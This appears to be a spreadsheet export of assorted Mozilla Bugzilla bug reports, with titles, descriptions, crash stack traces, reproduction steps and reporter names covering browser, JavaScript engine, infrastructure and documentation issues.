  <si>
    <t>morkTable::RowToPos doesn't quite work because it is incorrectly casting ioRow
to morkRow instead of morkRowObject.  Patch coming.</t>
  </si>
  <si>
    <t>CORE-12559</t>
  </si>
  <si>
    <t>basedLink.pathname Link.port Link.protocol and Link.search return undefined.</t>
  </si>
  <si>
    <t>Link.pathname Link.port Link.protocol and Link.search return undefined
instead of returning pathname port protocol and search part of URL
BUILDS:
08-24-13 [M9] [Apprunner/Viewer]
08-24-09 [M10] [Apprunner/Viewer]
STEPS TO REPRODECE:
1] Please copy HTML code I'm providing. Save it as HTML file.
2] Open this file with Apprunner/Viewer.
3] You'll see one button called
Check pathname port protocol search for Link.
4] Click this button.
EXPECTED RESULTS:
Link.pathname :/index.html
Link.port :Port [Communication port that server uses].
Link.protocol :http:
Link.search :?ser=10
ACTUAL RESULTS:
Link.pathname :undefined
Link.port :undefined
Link.protocol :undefined
Link.search :undefined
CODE:
Link Test
&lt;!--
function linkprop(){
document.workform.result.value=document.links[0].pathname
document.workform.result1.value=document.links[0].port
document.workform.result2.value=document.links[0].protocol
document.workform.result3.value=document.links[0].search
}
//--&gt;
Test Link:
http://www.netscape.com/index.html?ser=10
Link.pathname:
Link.port    :
Link.protocol:
Link.search  :
&lt;INPUT TYPE=button NAME=but1 VALUE=Check pathname port protocol search
for Link onClick=linkprop()&gt;
Expected Answers:
Link.pathname    :/index.html
Link.port        :Communication port that server uses.
Link.protocol    :http:
Link.search      :?ser=10
END OF CODE:</t>
  </si>
  <si>
    <t>desale</t>
  </si>
  <si>
    <t>CORE-338865</t>
  </si>
  <si>
    <t>Scriptable iface inheriting from noscript iface should throw error</t>
  </si>
  <si>
    <t>Currently XPIDL prints a warning whenever a scriptable interface inherits from a non-scriptable interface.  These are the three that I have run into:
./imgIDecoderObserver.idl:96: Warning: imgIDecoderObserver is scriptable but
inherits from the non-scriptable interface imgIContainerObserver
./nsIScriptSecurityManager.idl:277: Warning: nsIScriptSecurityManager is
scriptable but inherits from the non-scriptable interface nsIXPCSecurityManager
./nsIWindowCreator2.idl:93: Warning: nsIWindowCreator2 is scriptable but
inherits from the non-scriptable interface nsIWindowCreator
Since a scriptable interface inheriting from a non-scriptable interface doesn't make much sense bz suggested that this warning be turned into a hard error.</t>
  </si>
  <si>
    <t>continuation</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-524775</t>
  </si>
  <si>
    <t>Enable a11y and tests on OSX debug builds on accessibility branch</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-337675</t>
  </si>
  <si>
    <t>improper automatic nsISupportsWeakReference handling for java-based xpcom objects</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Passing a java-based implementation of an xpcom into a method that expects nsISupportsWeakReference results in creating an instantly invalid weak reference if the passed java object has no other references to its xpcom stub. The problematic code is in the SetupParams native function. In the case of native xpcom object the weak reference conversion is handled properly as follows:
            nsCOMPtr supportsweak =
                                                   do_QueryInterface(xpcom_obj)
            if (supportsweak) {
              nsWeakPtr weakref
              supportsweak-&gt;GetWeakReference(getter_AddRefs(weakref))
              NS_RELEASE(xpcom_obj)
              xpcom_obj = weakref
              NS_ADDREF(xpcom_obj)
            } else {
              xpcom_obj = nsnull
            } 
in the case of java-based implementation the code is a bit strange:
            nsJavaXPTCStub* stub = NS_STATIC_CAST(nsJavaXPTCStub*
                                                 NS_STATIC_CAST(nsXPTCStubBase*
                                                                xpcom_obj))
            nsJavaXPTCStubWeakRef* weakref
            weakref = new nsJavaXPTCStubWeakRef(java_obj stub)
            if (!weakref) {
              rv = NS_ERROR_OUT_OF_MEMORY
              break
            }
            NS_RELEASE(xpcom_obj)
            xpcom_obj = weakref
            NS_ADDREF(xpcom_obj) 
Here a weak reference stub is created but the underlying stub is not getting its weak reference count updated. Therefore the following NS_RELEASE(xpcom_obj) destroys that object without regard to the weak reference. The net result here is that weak reference refers to a deleted stub but does not know this. Further attemps to dereference or even free this weak reference can result in a system crash.
I have managed to work around this problem by changing the code for java-based xpcom case to be similar to the native case. This may cause memory leaks or some other problems but at least it fixes this bug.
Reproducible: Always</t>
  </si>
  <si>
    <t>alexander.kireyev</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-440175</t>
  </si>
  <si>
    <t>Setup a new vista VM for unittest-staging</t>
  </si>
  <si>
    <t>We require a virtual machine running Vista for running automated tests. 
The machine should have at least 1gb of RAM and three disk partitions (sata) :
C: 9.7gb
D: (tools) 10gb
E: (builds) 30gb
It will also need Visual Studio 2005.
Please name:
bm-vista-unittest-01</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-523379</t>
  </si>
  <si>
    <t>Please clone a temporary VM of CentOS-5-x64-ref</t>
  </si>
  <si>
    <t>I need to build gcc-4.3.3 for our linux64 slaves.  In order to do this I need access to one of our linux64 slaves.  Because we only have one for each pool could I please have a temporary clone of this VM to work on?</t>
  </si>
  <si>
    <t>CORE-817342</t>
  </si>
  <si>
    <t>Crash [@ js::GCMarker::processMarkStackTop(js::SliceBudget&amp;) ] with Redirector Extension</t>
  </si>
  <si>
    <t>Created attachment 687457
stack trace
As a result of bug 790338 there is a new crash that can be exposed when the Print Edit and Redirector extensions are present and Print Edit is invoked.
bp-da0b6941-aaee-4977-aa90-fe7372121201
Regression window: http://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=7e6ac3bfbae9&amp;tochange=26172ff887ae
STR
1. Launch Firefox with a new profile
2. Install the following extensions and restart Firefox:
a) Print Edit: https://addons.mozilla.org/en-US/firefox/addon/print-edit/
b) Redirector: https://addons.mozilla.org/en-US/firefox/addon/redirector/
3. Click the home button to load the Firefox default home page
4. Right-click the page and choose Print... --&gt; Print Edit
5. Wait a few seconds
Crashing Thread
Frame 	Module 	Signature 	Source
0 	mozjs.dll 	js::GCMarker::processMarkStackTop 	js/src/gc/Marking.cpp:1348
1 	mozjs.dll 	js::GCMarker::drainMarkStack 	js/src/gc/Marking.cpp:1407
2 	mozjs.dll 	MarkGrayReferences 	js/src/jsgc.cpp:2743
3 	mozjs.dll 	EndMarkingCompartmentGroup 	js/src/jsgc.cpp:3214
4 	mozjs.dll 	SweepPhase 	js/src/jsgc.cpp:3441
5 	mozjs.dll 	IncrementalCollectSlice 	js/src/jsgc.cpp:3879
6 	mozjs.dll 	GCCycle 	js/src/jsgc.cpp:4006
7 	mozjs.dll 	Collect 	js/src/jsgc.cpp:4121
8 	mozjs.dll 	js::GCFinalSlice 	js/src/jsgc.cpp:4166
9 	xul.dll 	CCTimerFired 	dom/base/nsJSEnvironment.cpp:3256
10 	xul.dll 	nsTimerEvent::Run 	xpcom/threads/nsTimerImpl.cpp:565
11 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:627
12 	xul.dll 	mozilla::ipc::MessagePump::Run 	ipc/glue/MessagePump.cpp:82
13 	xul.dll 	MessageLoop::RunHandler 	ipc/chromium/src/base/message_loop.cc:208
14 	xul.dll 	MessageLoop::Run 	ipc/chromium/src/base/message_loop.cc:182
15 	xul.dll 	nsBaseAppShell::Run 	widget/xpwidgets/nsBaseAppShell.cpp:163
16 	xul.dll 	nsAppShell::Run 	widget/windows/nsAppShell.cpp:229
17 	xul.dll 	nsAppStartup::Run 	toolkit/components/startup/nsAppStartup.cpp:290
18 	xul.dll 	XREMain::XRE_mainRun 	toolkit/xre/nsAppRunner.cpp:3823
19 	xul.dll 	XREMain::XRE_main 	toolkit/xre/nsAppRunner.cpp:3890
20 	xul.dll 	XRE_main 	toolkit/xre/nsAppRunner.cpp:4084
21 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:105
22 	firefox.exe 	__tmainCRTStartup 	crtexe.c:552
23 	kernel32.dll 	BaseThreadInitThunk 	
24 	ntdll.dll 	__RtlUserThreadStart 	
25 	ntdll.dll 	_RtlUserThreadStart</t>
  </si>
  <si>
    <t>CORE-445818</t>
  </si>
  <si>
    <t>Crash in Javascript on N810 (arm).</t>
  </si>
  <si>
    <t>Latest trunk arm N810.
Visit some google service pages mail/maps/documents
5/10 it will crash in:
#0  js_Dequeue (tl=0xb99dc) at js/src/jslock.cpp:993
#1  0x41e8d06c in js_AtomizeString (cx=0xb124d8 str=0xbed41c98 flags=8) at js/src/jsatom.cpp:704
#2  0x41e8d23c in js_AtomizeChars (cx=0x0 chars=0x0 length=760284 flags=0) at js/src/jsatom.cpp:756
#3  0x41eee93c in js_GetToken (cx=0xb124d8 ts=0xbed42e80) at js/src/jsscan.cpp:1258
#4  0x41ef0478 in js_MatchToken (cx=0x0 ts=0xbed42e80 tt=TOK_YIELD) at js/src/jsscan.cpp:1999
#5  0x41ed8304 in AssignExpr (cx=0xb124d8 ts=0xbed42e80 tc=0xbed422f8) at js/src/jsparse.cpp:3701
#6  0x41ede854 in Variables (cx=0xb124d8 ts=0xbed42e80 tc=0xbed422f8) at js/src/jsparse.cpp:3637
#7  0x41edac94 in Statement (cx=0xb124d8 ts=0xbed42e80 tc=0xbed422f8) at js/src/jsparse.cpp:3239
#8  0x41edc1a4 in Statements (cx=0xb124d8 ts=0xbed42e80 tc=0xbed422f8) at js/src/jsparse.cpp:1455
#9  0x41edc33c in FunctionBody (cx=0xb124d8 ts=0xbed42e80 tc=0xbed422f8) at js/src/jsparse.cpp:851
#10 0x41edc6a0 in FunctionDef (cx=0xb124d8 ts=0xbed42e80 tc=0xbed42710 lambda=8) at js/src/jsparse.cpp:1295
#11 0x41edd5a0 in PrimaryExpr (cx=0xb124d8 ts=0xbed42e80 tc=0xbed42710 tt=TOK_FUNCTION afterDot=0) at js/src/jsparse.cpp:5352
....
#58 0x41ed8328 in AssignExpr (cx=0xb124d8 ts=0xbed42e80 tc=0xbed42cf8) at js/src/jsparse.cpp:3818
#59 0x41ed86f4 in Expr (cx=0xb124d8 ts=0xbed42e80 tc=0xbed42cf8) at js/src/jsparse.cpp:3662
#60 0x41ed9bb4 in Statement (cx=0xb124d8 ts=0xbed42e80 tc=0xbed42cf8) at js/src/jsparse.cpp:3454
#61 0x41edf540 in js_CompileScript (cx=0xb124d8 obj=0xbed42cf8 principals=0xb99dc tcflags=2048 chars=0x49589010 length=1102854124 file=0x41edf540 
    filename=0x41bc37ec Â°\022\203@4Â¦\203@T=Â¹AÂ°ÃšÂºAT=Â¹AT=Â¹A\\\021\203@Ã°\005Â»A@ÃˆÂ¹AT=Â¹AT=Â¹AÃŒÂ¬ÂºAT=Â¹AT=Â¹AT=Â¹AT=Â¹AT=Â¹AT=Â¹AÂ¸ÃžÂºA\204v\177@T=Â¹A0$ÂºAT=Â¹A\200ÃžÂºAÃ¸Ã•Â¹AÃ°\205\201@T=Â¹AÃ„3ÂºA\214\017\203@T=Â¹A\f*ÂºA$Â¢Â¹AtÂ¨ÂºAT=Â¹AT=Â¹AT=Â¹AT=Â¹AT=Â¹AT=Â¹AÂ¼#Â»Ax[Â¼AÂ¬:Â¼A`Â¸y@\034]Â¼AÃŒ\023\002 lineno=11609348)
    at js/src/jsparse.cpp:611
(gdb) frame 0
#0  js_Dequeue (tl=0xb99dc) at /home/romaxa/microbcomponent/hg/mozilla/js/src/jslock.cpp:993
993	    PR_Lock(fl-&gt;slock)
(gdb) l 
988	    JSFatLock *fl = tl-&gt;fat
989	    PRStatus stat
990	
991	    JS_ASSERT(fl != NULL)
992	    JS_ASSERT(fl-&gt;susp &gt; 0)
993	    PR_Lock(fl-&gt;slock)
994	    js_UnlockGlobal(tl)
995	    stat = PR_NotifyCondVar(fl-&gt;svar)
996	    JS_ASSERT(stat != PR_FAILURE)
997	    PR_Unlock(fl-&gt;slock)
(gdb) p *tl 
$3 = {owner = 0 fat = 0x0}</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-413623</t>
  </si>
  <si>
    <t>Add Security Exception dialog is unusable at high dpi</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b3pre) Gecko/2008012204 Minefield/3.0b3pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b3pre) Gecko/2008012204 Minefield/3.0b3pre
The Add Security Exception dialog is unusable at high dpi. To make things clear i've attached a screenshot.
Reproducible: Always
Steps to Reproduce:
1. use high dpi
2. go to tools &gt; options &gt; advanced &gt; encryption &gt; view certificats &gt; servers &gt; add exception (or visit to a page with a flawed certificate and click the add exception button
3. click the get certificate button
Actual Results:  
the certificate status box enlarges and pushes the confirm security exception buttons out of view
Expected Results:  
the certificate status box should'nt enlarge</t>
  </si>
  <si>
    <t>michael.arnauts</t>
  </si>
  <si>
    <t>CORE-34170</t>
  </si>
  <si>
    <t>nsScriptError not thread-safe</t>
  </si>
  <si>
    <t>I hit a thread-safety assertion canceling out of the mail account setup window:
NTDLL! 77f7629c()
nsDebug::Assertion(const char * 0x016a6834 const char * 0x016a681c const char 
* 0x016a67e4 int 0x0000001f) line 189 + 13 bytes
nsDebug::PreCondition(const char * 0x016a6834 const char * 0x016a681c const 
char * 0x016a67e4 int 0x0000001f) line 282 + 21 bytes
nsScriptError::AddRef(nsScriptError * const 0x04769390) line 31 + 36 bytes
nsScriptErrorConstructor(nsISupports * 0x00000000 const nsID &amp; {...} void * * 
0x0012ec1c) line 29 + 141 bytes
nsGenericFactory::CreateInstance(nsGenericFactory * const 0x04769680 
nsISupports * 0x00000000 const nsID &amp; {...} void * * 0x0012ec1c) line 48
nsComponentManagerImpl::CreateInstance(nsComponentManagerImpl * const 
0x01075b20 const nsID &amp; {...} nsISupports * 0x00000000 const nsID &amp; {...} 
void * * 0x0012ec1c) line 1156 + 24 bytes
nsComponentManagerImpl::CreateInstanceByProgID(nsComponentManagerImpl * const 
0x01075b20 const char * 0x0038dbf8 nsISupports * 0x00000000 const nsID &amp; 
{...} void * * 0x0012ec1c) line 1196
nsComponentManager::CreateInstance(const char * 0x0038dbf8 nsISupports * 
0x00000000 const nsID &amp; {...} void * * 0x0012ec1c) line 94
nsCreateInstanceByProgID::operator()(const nsID &amp; {...} void * * 0x0012ec1c) 
line 122 + 27 bytes
nsCOMPtr::assign_from_helper(const nsCOMPtr_helper &amp; {...} 
const nsID &amp; {...}) line 825 + 18 bytes
nsCOMPtr::nsCOMPtr(const nsCOMPtr_helper &amp; 
{...}) line 528
nsDocShell::ReportScriptError(nsDocShell * const 0x04065c38 const char * 
0x04769870 const char * 0x00000000 int 0x00000000 const char * 0x00000000) 
line 1939
NS_ScriptErrorReporter(JSContext * 0x04066b70 const char * 0x04769870 
JSErrorReport * 0x0012efa4) line 101
js_ReportErrorAgain(JSContext * 0x04066b70 const char * 0x047699d0 
JSErrorReport * 0x0012efa4) line 557 + 21 bytes
ReportError(JSContext * 0x04066b70 const char * 0x047699d0 JSErrorReport * 
0x0012efa4) line 265 + 17 bytes
js_ReportErrorNumberVA(JSContext * 0x04066b70 unsigned int 0x00000000 const 
JSErrorFormatString * (void * const char * const unsigned int)* 0x002a1ad7 
_js_GetErrorMessage void * 0x00000000 const unsigned int 0x00000093 int 
0x00000001 char * 0x0012f010) line 513 + 17 bytes
JS_ReportErrorNumber(JSContext * 0x04066b70 const JSErrorFormatString * (void 
* const char * const unsigned int)* 0x002a1ad7 _js_GetErrorMessage void * 
0x00000000 const unsigned int 0x00000093) line 2990 + 29 bytes
js_ReportUncaughtException(JSContext * 0x04066b70) line 661 + 25 bytes
JS_CallFunctionValue(JSContext * 0x04066b70 JSObject * 0x03134870 long 
0x01301540 unsigned int 0x00000001 long * 0x0012f100 long * 0x0012f0ac) line 
2796 + 9 bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x040655f0 void * 0x03134870 
void * 0x01301540 unsigned int 0x00000001 void * 0x0012f100 int * 0x0012f0fc) 
line 730 + 33 bytes
nsJSEventListener::HandleEvent(nsIDOMEvent * 0x04480704) line 128 + 57 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x0418b4a0 
nsIDOMEvent * 0x04480704 unsigned int 0x00000001 unsigned int 0x00000007) line 
703 + 19 bytes
nsEventListenerManager::HandleEvent(nsIPresContext * 0x04096690 nsEvent * 
0x0012fbcc nsIDOMEvent * * 0x0012f514 unsigned int 0x00000007 nsEventStatus * 
0x0012fc0c) line 1266 + 35 bytes
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x04066d00 
nsIPresContext * 0x04096690 nsEvent * 0x0012fbcc nsIDOMEvent * * 0x0012f514 
unsigned int 0x00000001 nsEventStatus * 0x0012fc0c) line 381
nsWebShell::OnEndDocumentLoad(nsWebShell * const 0x04065d14 nsIDocumentLoader * 
0x04065ab0 nsIChannel * 0x04094ca0 unsigned int 0x00000000) line 2413 + 51 
bytes
nsDocLoaderImpl::FireOnEndDocumentLoad(nsDocLoaderImpl * 0x04065ab0 nsIChannel 
* 0x04094ca0 unsigned int 0x00000000) line 620
nsDocLoaderImpl::DocLoaderIsEmpty(unsigned int 0x00000000) line 511
nsDocLoaderImpl::DocLoaderIsEmpty(unsigned int 0x00000000) line 483
nsDocLoaderImpl::OnStopRequest(nsDocLoaderImpl * const 0x04437f94 nsIChannel * 
0x04437680 nsISupports * 0x00000000 unsigned int 0x00000000 const unsigned 
short * 0x00000000) line 455
nsLoadGroup::RemoveChannel(nsLoadGroup * const 0x04436040 nsIChannel * 
0x04437680 nsISupports * 0x00000000 unsigned int 0x00000000 const unsigned 
short * 0x00000000) line 543 + 39 bytes
nsInputStreamChannel::OnStopRequest(nsInputStreamChannel * const 0x04437684 
nsIChannel * 0x04437590 nsISupports * 0x00000000 unsigned int 0x00000000 
const unsigned short * 0x00000000) line 473
nsOnStopRequestEvent::HandleEvent(nsOnStopRequestEvent * const 0x04438c10) line 
286
nsStreamListenerEvent::HandlePLEvent(PLEvent * 0x04438bc0) line 97 + 12 bytes
PL_HandleEvent(PLEvent * 0x04438bc0) line 563 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x01449550) line 508 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x01620732 unsigned int 0x0000c0bf unsigned int 
0x00000000 long 0x01449550) line 1018 + 9 bytes
USER32! 77e71820()</t>
  </si>
  <si>
    <t>BUGZILLA-190040</t>
  </si>
  <si>
    <t>sanitycheck should have view as buglist links after lists of bugs</t>
  </si>
  <si>
    <t>I was just tasked with fixing all of the errors sanitycheck.cgi found on
Bugscape.  (which was a LOT because nobody's ever done it before apparently )
One of the items found for example was Bugs with enough votes to have been
confirmed but haven't been following by individual links to about 300 bugs.
Seems like the easiest way to fix this would be view as buglist then change
several click confirm bugs and hit commit. :)  No way in hell am I going to
sit here and hand-confirm 300 bugs and doing it via SQL loses the history.
Patch to follow shortly.</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-401680</t>
  </si>
  <si>
    <t>MDC erratic behavior (wouldn't load pages etc) morning of Oct 30.</t>
  </si>
  <si>
    <t>Hi
I was going on MDC around 7:00 AM EST and it gave really erratic behavior.
Sometimes I got connection reset. Sometimes I got a page with a big yellow hardhat and the text Under Repairs and other times it would work fine.
Load times also seemed a bit long.</t>
  </si>
  <si>
    <t>themystic.ca</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-377531</t>
  </si>
  <si>
    <t>Sync www.mozilla.com for en-GB page fixes</t>
  </si>
  <si>
    <t>Bug 377528 pointed out some problems with the en-GB pages and I have fixed them in trunk and production tag. So please svn update.</t>
  </si>
  <si>
    <t>FIREFOX-283680</t>
  </si>
  <si>
    <t>Firefox in-place update fails</t>
  </si>
  <si>
    <t>For app-update instead of downloading standard .xpis Firefox is attempting to
install via xpi-wrapped native installer (smaller size for one).
Running Firefox launches the installer puts entry in xpicleanup.dat to get rid
of the installer.exe eventually.
Scenario I:
----------
If you leave Firefox running the installer eventually gets to a point where it
asks you to click OK to shut down Firefox. If you click the OK button to shut it
down (comes up twice see bug 283672) then Firefox shuts down apparently
without launching xpicleanup.exe
[On the side: the shutdown code attempts to pass the -kill option to shut down
turbo mode neither of which is supported by Firefox. A new browser window opens
instead which is a bit counter-productive if you're trying to shut it down.
Simply need to remove the turbo-killing lines from [Check Instance0] in config.ini]
At the end of the install the new Firefox is launched. It notices the entry in
xpicleanup.dat gives a shut down/restart message and launches xpicleanup.exe.
You should be able to restart Firefox now it's just a bit ugly getting here.
Scenario II:
------------
As above but instead of letting the installer kill Firefox shut it down
cleanly. xpicleanup.exe is launched to deal with the installer entry in
xpicleanup.dat but because the installer is still running it hangs around
trying every polling interval.
During the install it finds xpicleanup.exe is in use so another entry is made
in xpicleanup.dat to finish installing that when the install is over. I don't
think the installer launches another copy of xpicleanup.exe at the end though.
[At this point the xpi script should have returned a 999 status code to the
native installer because the xpicleanup.exe hangup means it couldn't complete
and the native installer should have put up a message about needing to restart
to complete the install. Not seeing that in Firefox.]
At the end you launch Firefox which gives the incomplete install message
because xpicleanup.dat exists. It launches another copy of xpicleanup.exe. The
installer goes away so that part of the cleanup can be accomplished but
xpicleanup can't delete itself so it just hangs around never able to finish. At
this point it should have put a startup entry in the windows registry--if you
reboot everything gets straightened out but if you keep starting Firefox you
just get the message and more copies of xpicleanup.exe all waiting for each
other to die.
Scenario II is uglier than Scenario I.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-465786</t>
  </si>
  <si>
    <t>onProgressChange isn't properly documented</t>
  </si>
  <si>
    <t>There seems to be an error in the documentation some of the onLocationChange for the all tabs listener code was copied to onProgressChange. See the URL:
1) I think the description of onProgressChange might be incorrect or inadequate.
2) This is the most glaring problem the function def header is onLocationChange! :)</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-92954</t>
  </si>
  <si>
    <t>expn.com - bad browser sniffing JavaScript</t>
  </si>
  <si>
    <t>Expn.com (the X-Games site) blocks Mozilla due to poorly written browser-
sniffing in JavaScript. The offending code lives in 
http://a12.g.akamaitech.net/7/12/621/001/expn.go.com/insertfiles/js/index.js
and uses two different kinds of browser sniffing for different parts of the 
script: some parts depend on matching navigator.appName against Netscape 
or Microsoft Internet Explorer while others check for the existence of 
nonstandard DOM objects.
The code for the second type is:
IE4 = (document.all) ? 1 : 0
NS4 = (document.layers) ? 1 : 0
ver4 = (IE4 || NS4) ? 1 : 0
|ver4| is used extensively throughout the code in places like this:
if (ver4) {
        secondIm = &lt;img 
src=http://a12.g.akamaitech.net/7/12/621/000/expn.go.com/i/sportnav.gif 
width=140 height=227 border=0  usemap=#navigation&gt;
        arPopups = new Array()
    }
    else { secondIm =  }
(note that the non-version 4 code path does nothing) and
function mapOver(whichon) {
        if (!ver4) { return }
        ...
so the image rollovers are disabled</t>
  </si>
  <si>
    <t>gwalla</t>
  </si>
  <si>
    <t>FIREFOX-329179</t>
  </si>
  <si>
    <t>Places Search Popup</t>
  </si>
  <si>
    <t>Per: http://wiki.mozilla.org/Places:User_Interface#Places_Search_Popup
- popup attached to toolbar button
- correct visual appearance regardless of where the toolbar button is customzied too
- simple presentation
- search results expand dialog
- expando/collapso button</t>
  </si>
  <si>
    <t>TOOLKIT-421841</t>
  </si>
  <si>
    <t>Breakpad continually sends the same crash report over and over until you manually stop it</t>
  </si>
  <si>
    <t>Breakpad continually sends the same crash report over and over until you manually stop it.
macbook:Crash Reports dave$ tail -50 submit.log 
[Sun Mar  9 21:31:31 2008] Crash report submitted successfully
[Sun Mar  9 21:31:36 2008] Crash report submitted successfully
[Sun Mar  9 21:31:42 2008] Crash report submitted successfully
[Sun Mar  9 21:31:47 2008] Crash report submitted successfully
[Sun Mar  9 21:31:52 2008] Crash report submitted successfully
[Sun Mar  9 21:31:57 2008] Crash report submitted successfully
[Sun Mar  9 21:32:02 2008] Crash report submitted successfully
[Sun Mar  9 21:32:07 2008] Crash report submitted successfully
[Sun Mar  9 21:32:13 2008] Crash report submitted successfully
[Sun Mar  9 21:32:18 2008] Crash report submitted successfully
[Sun Mar  9 21:32:23 2008] Crash report submitted successfully
[Sun Mar  9 21:32:28 2008] Crash report submitted successfully
[Sun Mar  9 21:32:33 2008] Crash report submitted successfully
[Sun Mar  9 21:32:39 2008] Crash report submitted successfully
[Sun Mar  9 21:32:44 2008] Crash report submitted successfully
[Sun Mar  9 21:32:49 2008] Crash report submitted successfully
[Sun Mar  9 21:32:54 2008] Crash report submitted successfully
[Sun Mar  9 21:32:59 2008] Crash report submitted successfully
[Sun Mar  9 21:33:05 2008] Crash report submitted successfully
[Sun Mar  9 21:33:10 2008] Crash report submitted successfully
[Sun Mar  9 21:33:15 2008] Crash report submitted successfully
[Sun Mar  9 21:33:20 2008] Crash report submitted successfully
[Sun Mar  9 21:33:25 2008] Crash report submitted successfully
[Sun Mar  9 21:33:31 2008] Crash report submitted successfully
[Sun Mar  9 21:33:36 2008] Crash report submitted successfully
[Sun Mar  9 21:33:41 2008] Crash report submitted successfully
[Sun Mar  9 21:33:46 2008] Crash report submitted successfully
[Sun Mar  9 21:33:51 2008] Crash report submitted successfully
[Sun Mar  9 21:33:56 2008] Crash report submitted successfully
[Sun Mar  9 21:34:02 2008] Crash report submitted successfully
[Sun Mar  9 21:34:07 2008] Crash report submitted successfully
[Sun Mar  9 21:34:12 2008] Crash report submitted successfully
[Sun Mar  9 21:34:17 2008] Crash report submitted successfully
[Sun Mar  9 21:34:22 2008] Crash report submitted successfully
[Sun Mar  9 21:34:28 2008] Crash report submitted successfully
[Sun Mar  9 21:34:33 2008] Crash report submitted successfully
[Sun Mar  9 21:34:38 2008] Crash report submitted successfully
[Sun Mar  9 21:34:43 2008] Crash report submitted successfully
[Sun Mar  9 21:34:48 2008] Crash report submitted successfully
[Sun Mar  9 21:34:53 2008] Crash report submitted successfully
[Sun Mar  9 21:34:59 2008] Crash report submitted successfully
[Sun Mar  9 21:35:04 2008] Crash report submitted successfully
[Sun Mar  9 21:35:09 2008] Crash report submitted successfully
[Sun Mar  9 21:35:14 2008] Crash report submitted successfully
[Sun Mar  9 21:35:21 2008] Crash report submitted successfully
[Sun Mar  9 21:35:26 2008] Crash report submitted successfully
[Sun Mar  9 21:35:31 2008] Crash report submitted successfully
[Sun Mar  9 21:35:36 2008] Crash report submitted successfully
[Sun Mar  9 21:36:48 2008] Crash report submitted successfully
[Sun Mar  9 21:36:53 2008] Crash report submitted successfully
macbook:Crash Reports dave$ cd submitted/
macbook:submitted dave$ ls -lt | grep 'Mar  9 21' | sed 's/.*dave  dave  188 //'
Mar  9 21:36 bp-76442782-ee42-11dc-b64d-001a4bd43ef6.txt
Mar  9 21:36 bp-732ebe2b-ee42-11dc-ac8e-001a4bd43e5c.txt
Mar  9 21:35 bp-488197a8-ee42-11dc-a4c2-001a4bd43ef6.txt
Mar  9 21:35 bp-456ccbca-ee42-11dc-8e0b-001a4bd43ed6.txt
Mar  9 21:35 bp-4257bfc2-ee42-11dc-b4ad-001a4bd43ed6.txt
Mar  9 21:35 bp-3f3eecc0-ee42-11dc-b483-001a4bd43e5c.txt
Mar  9 21:35 bp-3b73d4ae-ee42-11dc-a21c-001a4bd43e5c.txt
Mar  9 21:35 bp-38573e45-ee42-11dc-9d4b-001a4bd46e84.txt
Mar  9 21:35 bp-35424a0c-ee42-11dc-99ac-001a4bd43ed6.txt
Mar  9 21:34 bp-322d91e6-ee42-11dc-8a77-001a4bd43e5c.txt
Mar  9 21:34 bp-2f16a72b-ee42-11dc-9d7d-001a4bd43ed6.txt
Mar  9 21:34 bp-2bff4828-ee42-11dc-9f0f-001a4bd43ed6.txt
Mar  9 21:34 bp-28e87d30-ee42-11dc-bcd0-001a4bd43ed6.txt
Mar  9 21:34 bp-25d2b80f-ee42-11dc-af65-001a4bd43e5c.txt
Mar  9 21:34 bp-22bb63d1-ee42-11dc-915a-001a4bd43e5c.txt
Mar  9 21:34 bp-1fa5f521-ee42-11dc-af6f-001a4bd46e84.txt
Mar  9 21:34 bp-1c90850a-ee42-11dc-82ba-001a4bd43e5c.txt
Mar  9 21:34 bp-197641e8-ee42-11dc-b89f-001a4bd43ed6.txt
Mar  9 21:34 bp-1660729c-ee42-11dc-bf7c-001a4bd46e84.txt
Mar  9 21:34 bp-1348aff3-ee42-11dc-b370-001a4bd43ed6.txt
Mar  9 21:34 bp-103109a6-ee42-11dc-9b62-001a4bd46e84.txt
Mar  9 21:33 bp-0d1c210f-ee42-11dc-8dba-001a4bd43ed6.txt
Mar  9 21:33 bp-0a063b1e-ee42-11dc-bad0-001a4bd43ed6.txt
Mar  9 21:33 bp-06f1e37d-ee42-11dc-aed3-001a4bd43e5c.txt
Mar  9 21:33 bp-03db999e-ee42-11dc-93db-001a4bd43ed6.txt
Mar  9 21:33 bp-00c65c1e-ee42-11dc-8c88-001a4bd43ed6.txt
Mar  9 21:33 bp-fdb0998f-ee41-11dc-8b39-001a4bd43ed6.txt
Mar  9 21:33 bp-fa97c7cc-ee41-11dc-97b8-001a4bd46e84.txt
Mar  9 21:33 bp-f77a7d51-ee41-11dc-b930-001a4bd43e5c.txt
Mar  9 21:33 bp-f4649bca-ee41-11dc-8560-001a4bd43ed6.txt
Mar  9 21:33 bp-f14f119c-ee41-11dc-94ef-001a4bd43e5c.txt
Mar  9 21:33 bp-ee3495d4-ee41-11dc-9cd2-001a4bd43ef6.txt
Mar  9 21:32 bp-eb164ba3-ee41-11dc-a5f6-001a4bd43ed6.txt
Mar  9 21:32 bp-e7f9ad07-ee41-11dc-8c5a-001a4bd43ed6.txt
Mar  9 21:32 bp-e4e47511-ee41-11dc-9999-001a4bd46e84.txt
